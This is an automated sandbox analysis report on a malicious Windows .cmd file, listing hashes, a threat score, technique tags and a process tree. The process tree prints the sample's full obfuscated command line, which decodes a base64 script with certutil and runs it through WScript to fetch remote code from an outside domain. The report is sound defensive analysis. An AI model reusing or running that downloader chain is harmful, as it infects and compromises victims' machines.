5f14cc7f6d1f7bb086cc919162c12a68e6ad5fa0eff346b659d3ed6933e09184

Analysis

max time kernel
38s
max time network
101s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
20/03/2023, 12:01

Target

Doc_2832233887.335561.17564.cmd
Size

323B
MD5

8610c13e7131e2104e5e9fe763dcb11f
SHA1

96d6beb6244a7f1581edc0929c543249fd622c86
SHA256

5f14cc7f6d1f7bb086cc919162c12a68e6ad5fa0eff346b659d3ed6933e09184
SHA512

13b8785b44b1d75ed4a41e57ecac7e1722879cf5fb089665b1d3e929bbe412c703c3529972bd7967a26ace1222faceaac25d7faa1481cba3870bfb2807235221

Score

8^/10

Blocklisted process makes network request 3 IoCs

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1384 wrote to memory of 992	1384	cmd.exe	29
PID 1384 wrote to memory of 992	1384	cmd.exe	29
PID 1384 wrote to memory of 992	1384	cmd.exe	29
PID 992 wrote to memory of 676	992	cmd.exe	31
PID 992 wrote to memory of 676	992	cmd.exe	31
PID 992 wrote to memory of 676	992	cmd.exe	31
PID 992 wrote to memory of 948	992	cmd.exe	32
PID 992 wrote to memory of 948	992	cmd.exe	32
PID 992 wrote to memory of 948	992	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Doc_2832233887.335561.17564.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1384
- C:\Windows\system32\cmd.exe
  cmd C:\Windows\system32\cmd.exe /V/D/c "md C:+PPO1\>nul 2>&1 &&s^eT NKXN=C:+PPO1\^053PPO1.^jS&&echo dmFyIENFYVE9InNjIisiciI7REVhUT0iaXAiKyJ0OmgiO0VFYVE9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDRWFRK0RFYVErRUVhUSsiLy90ZG9pZTcuZW1hbnVlbGx5cmViZWNhYmFwdGlzdGFnYXAuYm9uZC8/MS8iKTs=>!NKXN!&&cErtUtil -f -dEco^de !NKXN! !NKXN!&&ca^ll !NKXN!"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:992
- - C:\Windows\system32\certutil.exe
    cErtUtil -f -dEcode C:+PPO1\053PPO1.jS C:+PPO1\053PPO1.jS
    3⤵
    PID:676
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\+PPO1\053PPO1.jS"
    3⤵
    - Blocklisted process makes network request
    PID:948

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Admin\AppData\Local\Temp\+PPO1\053PPO1.jS

Filesize
170B

MD5
ce3814a47bc2aa91989c705fd8ab6231

SHA1
676aaf578c54f8d335606e7ac08b3edaf816cb59

SHA256
34bf168d5f4e552751af0b4a8771dcabe89f8a9befa5ef58adec785376c41fd6

SHA512
ec662350d5aa023cffd82c8e1eef9fde0ce6b7cff6e0a71e69f324d01e594261e298408369d70df283fa649cc3be0f39602c8c05fc6350be398e9845d2b304f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\+PPO1\053PPO1.jS

Filesize
125B

MD5
bb622772b804691b44207300c08a6a76

SHA1
055c7a0485d9a0fee48b4fc37c9dd7ed13983b61

SHA256
44b3dd740e8b04a30491b370563573201b877c7902ac8ffdc78d74558a512ac5

SHA512
a15779ab175f7fe37fb065958fdf6915a9ef42d1aca89599b2f1f96cf047b0ab0906047c980a307efed3cee1542a074e1ce257c1b190a1bc7d8e4536158c5d83

Download Submit